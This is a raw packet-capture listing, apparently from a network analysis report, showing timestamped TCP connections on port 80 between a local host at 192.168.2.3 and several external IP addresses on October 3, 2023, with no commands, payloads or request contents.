                                                                    Oct 3, 2023 09:55:16.628103971 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.628128052 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.628418922 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.628479958 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.629141092 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629180908 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629240990 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.629328966 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629443884 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629482031 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629506111 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.629559040 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.629636049 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.630479097 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630517006 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630637884 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.630646944 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630685091 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630723000 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630745888 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.630791903 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630852938 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.630861044 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630953074 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.630990982 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631014109 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.631067991 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631129980 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.631191969 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631263018 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631319046 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.631371975 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631439924 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631500006 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.631584883 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631747961 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631786108 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631803989 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.631916046 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.631972075 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.632005930 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632469893 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632525921 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.632569075 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632678986 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632741928 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.632751942 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632822990 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632880926 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.632925987 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.632978916 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633038998 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.633049965 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633383036 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633438110 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633440018 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.633475065 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633543015 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.633568048 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633686066 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633739948 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.633786917 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633825064 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633878946 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.633893967 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.633963108 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634021044 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.634107113 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634215117 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634273052 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634278059 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.634310961 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634363890 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.634711981 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634761095 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634804964 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634814978 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.634871006 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.634923935 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.669470072 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669553041 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669639111 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669683933 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.669738054 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669809103 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669887066 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.669928074 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670010090 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670032978 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670101881 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670171022 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670227051 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670298100 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670358896 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670382977 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670470953 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670509100 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670536995 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670591116 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670655012 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670671940 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670762062 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670825958 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.670847893 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670917034 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.670979023 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671039104 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671076059 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671113968 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671142101 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671149969 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671206951 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671222925 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671258926 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671318054 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671325922 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671394110 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671463966 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671499014 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671650887 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671705961 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671740055 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671808958 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671863079 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.671880007 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.671948910 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672004938 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672020912 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672126055 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672164917 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672187090 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672271967 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672322989 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672377110 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672446012 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672501087 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672554970 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672663927 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672720909 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672724962 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672815084 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672868967 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.672903061 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.672991037 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673044920 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.673079014 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673182011 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673239946 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673238993 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.673310041 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673360109 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.673396111 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673465014 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673530102 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.673583984 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673676014 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673755884 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673780918 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.673866987 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673906088 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.673923969 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674009085 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674046040 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674062967 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674113035 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674151897 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674173117 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674252987 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674290895 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674309015 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674328089 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674365044 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674380064 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674401999 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674457073 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674489021 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674526930 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674563885 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674576044 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.674664021 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.674716949 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.709801912 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.709841967 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.709882021 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.709956884 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.710002899 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.710067987 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.710078955 CEST8049843193.149.185.139192.168.2.3
                                                                    Oct 3, 2023 09:55:16.750664949 CEST4984380192.168.2.3193.149.185.139
                                                                    Oct 3, 2023 09:55:16.934801102 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:17.246535063 CEST8049849180.94.156.61192.168.2.3
                                                                    Oct 3, 2023 09:55:17.246814013 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:17.246929884 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:17.246965885 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:17.558624029 CEST8049849180.94.156.61192.168.2.3
                                                                    Oct 3, 2023 09:55:17.658610106 CEST8049847172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:17.658628941 CEST8049847172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:17.658689976 CEST4984780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:17.659694910 CEST4984780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:17.779647112 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:17.874619007 CEST8049852104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:17.874713898 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:17.875031948 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:17.875524044 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:17.969577074 CEST8049852104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:17.970046043 CEST8049852104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:18.286426067 CEST8049849180.94.156.61192.168.2.3
                                                                    Oct 3, 2023 09:55:18.286492109 CEST8049849180.94.156.61192.168.2.3
                                                                    Oct 3, 2023 09:55:18.286609888 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:18.286637068 CEST4984980192.168.2.3180.94.156.61
                                                                    Oct 3, 2023 09:55:18.368967056 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:18.463749886 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:18.463840008 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:18.464087009 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:18.558650970 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:18.598047018 CEST8049849180.94.156.61192.168.2.3
                                                                    Oct 3, 2023 09:55:18.790712118 CEST8049852104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:18.790791035 CEST8049852104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:18.791071892 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:18.796230078 CEST4985280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:18.912209988 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.006690025 CEST8049857172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.006918907 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.006995916 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.007320881 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.101660013 CEST8049857172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.101922989 CEST8049857172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335035086 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335084915 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335095882 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335242987 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335304976 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335365057 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335367918 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335367918 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335367918 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335426092 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335434914 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335467100 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335474968 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335525990 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335551023 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335592031 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335598946 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335633039 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335674047 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335721970 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335762024 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335808992 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335850000 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335867882 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335884094 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.335906029 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335906029 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335932016 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.335962057 CEST8049855104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.336008072 CEST4985580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.559520960 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.559545994 CEST8049857172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.559566975 CEST8049857172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.559662104 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.560936928 CEST4985780192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.654478073 CEST8049859104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.654722929 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.654803991 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.655217886 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.676315069 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.749639988 CEST8049859104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.749933958 CEST8049859104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.770766020 CEST8049860172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:19.771080971 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.979816914 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.980041981 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:19.984169006 CEST8049859104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.984195948 CEST8049859104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:19.984263897 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:19.985507011 CEST4985980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.074359894 CEST8049860172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:20.074388981 CEST8049860172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:20.114404917 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.214541912 CEST8049861104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:20.214675903 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.222357035 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.222754002 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.232137918 CEST8049860172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:20.232225895 CEST8049860172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:20.232554913 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:20.233195066 CEST4986080192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:20.316967964 CEST8049861104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:20.317923069 CEST8049861104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:20.598479986 CEST8049861104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:20.598525047 CEST8049861104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:20.598702908 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.723889112 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:20.726974010 CEST4986180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:20.818876028 CEST8049863104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:20.818962097 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:20.820481062 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:20.820866108 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:20.865283966 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:20.915559053 CEST8049863104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:20.915616035 CEST8049863104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:20.960227966 CEST8049864172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:20.960438013 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:20.960655928 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:20.961095095 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:21.055223942 CEST8049864172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:21.055578947 CEST8049864172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:21.159193039 CEST8049863104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:21.159261942 CEST8049863104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:21.159341097 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:21.160099983 CEST4986380192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:21.278683901 CEST8049864172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:21.278801918 CEST8049864172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:21.278991938 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:21.279895067 CEST4986480192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:21.403768063 CEST4986580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:21.463494062 CEST4986680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:21.506156921 CEST8049865104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:21.506464958 CEST4986580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:21.506994963 CEST4986580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:21.506994963 CEST4986580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:21.558554888 CEST8049866172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:21.558674097 CEST4986680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:21.558842897 CEST4986680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:21.559259892 CEST4986680192.168.2.3172.67.137.125
